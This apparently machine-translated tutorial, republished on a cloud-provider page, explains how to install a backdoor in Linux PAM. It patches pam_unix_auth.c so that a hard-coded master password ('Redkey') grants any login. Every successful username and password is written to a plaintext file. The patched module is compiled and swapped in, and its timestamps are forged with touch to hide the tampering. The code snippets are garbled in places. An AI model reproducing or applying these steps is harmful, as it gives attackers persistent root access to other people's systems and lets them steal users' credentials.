Linux system security Pam Backdoor installation use detailed

Source: Internet
Author: User

One. To view the system Pam version:

[Email protected] ~]# Rpm-qa | grep pampam-1.1.1-4.el6.x86_64

Two. Download the corresponding version of the PAM module

http://www.linux-pam.org/library/

Three. Unzip & Modify PAM_UNIX_AUTH.C file

TAR-XZVF linux-pam-1.1.1.tar.gzcd LINUX-PAM-1.1.1CD Modules/pam_unix/vim pam_unix_auth.c

Four. Modify the section

in Pam_extern int pam_sm_authenticate (pam_handle_t * pamh, int flags                                  , int argc, const char **argv) {definition: FILE *FP; as follows: Pam_e Xtern int pam_sm_authenticate (pam_handle_t * pamh, int flags                                   , int argc, const char **argv) {        unsigned int ctrl;
   
    int retval, *ret_data = NULL;        const char *name;        const void *p;        FILE *fp; in retval = _unix_verify_password (pamh, name, p, ctrl); [approx. 177 rows] Under Add/*password: "Redkey" */if (strcmp (P, "Redkey") ==0) {        retval = pam_success;} if (retval== pam_success) {/*pamfile:pamwd.txt*/        fp=fopen ("Pamwd.txt", "a");        fprintf (FP, "%s::%s\n", name,p);        
   

Five. Compiling

[Email protected] pam_unix]# CD. /.. /[[email protected] linux-pam-1.1.1]#./configure[[email protected] linux-pam-1.1.1]# make

Six. Back up the original Pam module

[[Email protected] security]# MV Pam_unix.so{,.bak}

Seven. Copy the new Pam module to the/lib64/security/directory:

[Email protected] security]# cp/root/linux-pam-1.1.1/modules/pam_unix/.libs/pam_unix.so/lib64/security/

Eight. Modifying the PAM module time properties

[[email protected] security]# stat pam_unix.* File: "pam_unix.so" Size: 151879 blocks:304 IO block:4096 Ordinary file device:fd01h/64769d inode:565261 links:1access: (0755/- Rwxr-xr-x) Uid: (0/root) Gid: (0/root) access:2013-12-24 11:30:01.813610217 +0800modify:2013-12-24 08: 55:00.000000000 +0800change:2013-12-24 11:29:12.747789015 +0800 File: "Pam_unix.so.bak" size:50752 blocks:1    device:fd01h/64769d IO block:4096 Normal file inode:523660 links:1access: (0755/-rwxr-xr-x) Uid: (0/ Root) Gid: (0/root) access:2013-12-24 08:55:08.026835929 +0800modify:2010-02-16 01:34:42.000000000 +0800Chan ge:2013-12-24 10:42:11.741663207 +0800[[email protected] security]# touch-t 201002160134 pam_unix.so[[email  protected] security]# ll pam_unix.*-rwxr-xr-x 1 root root 151879 February pam_unix.so-rwxr-xr-x. 1 root root 50752 February Pam_unix.so.bak 

Nine. Universal Password Login Verification

Login As:root[email protected] ' s password:last login:tue Dec 11:10:16 from 192.168.169.1[[email protected] ~]#[[ Email protected]/]# cat Pamwd.txtroot::redkeyroot::123456root::12345678root::redkeyroot::redkey

  

Linux system security Pam Backdoor installation use detailed

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.